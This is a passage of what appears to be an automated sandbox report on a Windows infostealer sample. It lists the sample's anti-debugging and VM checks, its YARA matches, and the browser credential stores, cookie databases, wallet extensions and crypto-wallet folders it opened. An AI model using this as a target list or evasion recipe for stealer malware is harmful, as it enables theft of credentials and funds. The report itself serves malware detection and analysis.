                    Source: Amcache.hve.7.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                    Source: Amcache.hve.7.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeAPI call chain: ExitProcess graph end nodegraph_0-72470

                    Anti Debugging

                    barindex
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_004244E4 NtSetInformationThread 000000FE,00000011,00000000,00000000,?,?,?,?,?,0041EC640_2_004244E4
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeDebugger detection routine: NtQueryInformationProcess or NtQuerySystemInformation, DecisionNodes, ExitProcess or Sleepgraph_0-72556
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeThread information set: HideFromDebuggerJump to behavior
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeSystem information queried: KernelDebuggerInformationJump to behavior
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeProcess queried: DebugObjectHandleJump to behavior
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeProcess queried: DebugFlagsJump to behavior
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_00429EF7 rdtsc 0_2_00429EF7
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_0044E33B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0044E33B
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_0041F9A4 GetCurrentProcessId,NtDuplicateObject,NtClose,GetProcessId,NtQuerySystemInformation,NtQuerySystemInformation,0_2_0041F9A4
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_00422177 mov eax, dword ptr fs:[00000030h]0_2_00422177
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_00443998 mov ecx, dword ptr fs:[00000030h]0_2_00443998
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_0041F9A4 mov eax, dword ptr fs:[00000030h]0_2_0041F9A4
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_004262A1 mov eax, dword ptr fs:[00000030h]0_2_004262A1
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_0043B362 mov eax, dword ptr fs:[00000030h]0_2_0043B362
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_0044FB15 mov eax, dword ptr fs:[00000030h]0_2_0044FB15
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_004244E4 mov eax, dword ptr fs:[00000030h]0_2_004244E4
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_004224A3 mov eax, dword ptr fs:[00000030h]0_2_004224A3
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_004245EC mov eax, dword ptr fs:[00000030h]0_2_004245EC
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_00421EEB mov eax, dword ptr fs:[00000030h]0_2_00421EEB
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_00422817 mov eax, dword ptr fs:[00000030h]0_2_00422817
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_0041F916 mov eax, dword ptr fs:[00000030h]0_2_0041F916
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_004269E4 mov eax, dword ptr fs:[00000030h]0_2_004269E4
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_00424995 mov eax, dword ptr fs:[00000030h]0_2_00424995
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_00424995 mov eax, dword ptr fs:[00000030h]0_2_00424995
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_00426A42 mov eax, dword ptr fs:[00000030h]0_2_00426A42
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_0042F265 mov eax, dword ptr fs:[00000030h]0_2_0042F265
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_00424B24 mov eax, dword ptr fs:[00000030h]0_2_00424B24
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_0041EBEB mov eax, dword ptr fs:[00000030h]0_2_0041EBEB
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_00424BED mov eax, dword ptr fs:[00000030h]0_2_00424BED
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_00424C8D mov eax, dword ptr fs:[00000030h]0_2_00424C8D
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_0041E6F0 mov eax, dword ptr fs:[00000030h]0_2_0041E6F0
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_00429EF7 mov eax, dword ptr fs:[00000030h]0_2_00429EF7
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_008AD433 push dword ptr fs:[00000030h]0_2_008AD433
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_02352A7E mov eax, dword ptr fs:[00000030h]0_2_02352A7E
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_0234FB7D mov eax, dword ptr fs:[00000030h]0_2_0234FB7D
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_02373BFF mov ecx, dword ptr fs:[00000030h]0_2_02373BFF
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_02354BFC mov eax, dword ptr fs:[00000030h]0_2_02354BFC
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_02354BFC mov eax, dword ptr fs:[00000030h]0_2_02354BFC
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_023523DE mov eax, dword ptr fs:[00000030h]0_2_023523DE
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_02354853 mov eax, dword ptr fs:[00000030h]0_2_02354853
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_0233092B mov eax, dword ptr fs:[00000030h]0_2_0233092B
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_0234E957 mov eax, dword ptr fs:[00000030h]0_2_0234E957
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_02352152 mov eax, dword ptr fs:[00000030h]0_2_02352152
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_0235A15E mov eax, dword ptr fs:[00000030h]0_2_0235A15E
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_02354E54 mov eax, dword ptr fs:[00000030h]0_2_02354E54
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_0234EE52 mov eax, dword ptr fs:[00000030h]0_2_0234EE52
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_02354EF4 mov eax, dword ptr fs:[00000030h]0_2_02354EF4
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_0235270A mov eax, dword ptr fs:[00000030h]0_2_0235270A
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_0235474B mov eax, dword ptr fs:[00000030h]0_2_0235474B
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_0234FC0B mov eax, dword ptr fs:[00000030h]0_2_0234FC0B
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_02356C4B mov eax, dword ptr fs:[00000030h]0_2_02356C4B
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_02356CA9 mov eax, dword ptr fs:[00000030h]0_2_02356CA9
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_0235F4CC mov eax, dword ptr fs:[00000030h]0_2_0235F4CC
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_02356508 mov eax, dword ptr fs:[00000030h]0_2_02356508
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_0237FD7C mov eax, dword ptr fs:[00000030h]0_2_0237FD7C
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_02330D90 mov eax, dword ptr fs:[00000030h]0_2_02330D90
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_02354D8B mov eax, dword ptr fs:[00000030h]0_2_02354D8B
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_0236B5C9 mov eax, dword ptr fs:[00000030h]0_2_0236B5C9
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_0043323B GetProcessHeap,CreateDCW,GetSystemMetrics,GetSystemMetrics,DeleteDC,0_2_0043323B
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_0044E33B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0044E33B
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_0043D3A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0043D3A0
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_0043CE89 SetUnhandledExceptionFilter,0_2_0043CE89
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_0043CE95 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0043CE95
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_0236D0FC IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0236D0FC
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_0236D607 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0236D607
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_0237E5A2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0237E5A2
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_0043D0B8 cpuid 0_2_0043D0B8
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_0044614F GetSystemTimeAsFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,0_2_0044614F
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_00402476 GetComputerNameW,GetUserNameW,0_2_00402476
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeCode function: 0_2_00453BC4 GetTimeZoneInformation,0_2_00453BC4
                    Source: Amcache.hve.7.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                    Source: Amcache.hve.7.drBinary or memory string: msmpeng.exe
                    Source: Amcache.hve.7.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                    Source: Amcache.hve.7.drBinary or memory string: MsMpEng.exe

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: 0.3.g1kWKm20Z5.exe.23a0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.g1kWKm20Z5.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.g1kWKm20Z5.exe.23a0000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.g1kWKm20Z5.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.3614139526.0000000002330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.1693318740.00000000023A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.3613161605.0000000000A5A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: g1kWKm20Z5.exe PID: 1352, type: MEMORYSTR
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: g1kWKm20Z5.exeString found in binary or memory: %appdata%\Electrum\wallets
                    Source: g1kWKm20Z5.exeString found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
                    Source: g1kWKm20Z5.exeString found in binary or memory: %appdata%\Exodus\exodus.wallet
                    Source: g1kWKm20Z5.exeString found in binary or memory: %appdata%\Exodus\exodus.wallet
                    Source: g1kWKm20Z5.exe, 00000000.00000002.3616223948.00000000030C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance
                    Source: g1kWKm20Z5.exe, 00000000.00000002.3616223948.00000000030C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\EthereumBwlM&
                    Source: g1kWKm20Z5.exeString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                    Source: g1kWKm20Z5.exe, 00000000.00000002.3614564134.0000000002DBE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
                    Source: g1kWKm20Z5.exe, 00000000.00000002.3616223948.00000000030C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\CURRENTJump to behavior
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.logJump to behavior
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\key4.dbJump to behavior
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\MANIFEST-000001Jump to behavior
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmlJump to behavior
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcoblJump to behavior
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldbJump to behavior
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflalJump to behavior
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOG.oldJump to behavior
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOGJump to behavior
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhlJump to behavior
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfelJump to behavior
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                    Source: C:\Users\user\Desktop\g1kWKm20Z5.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
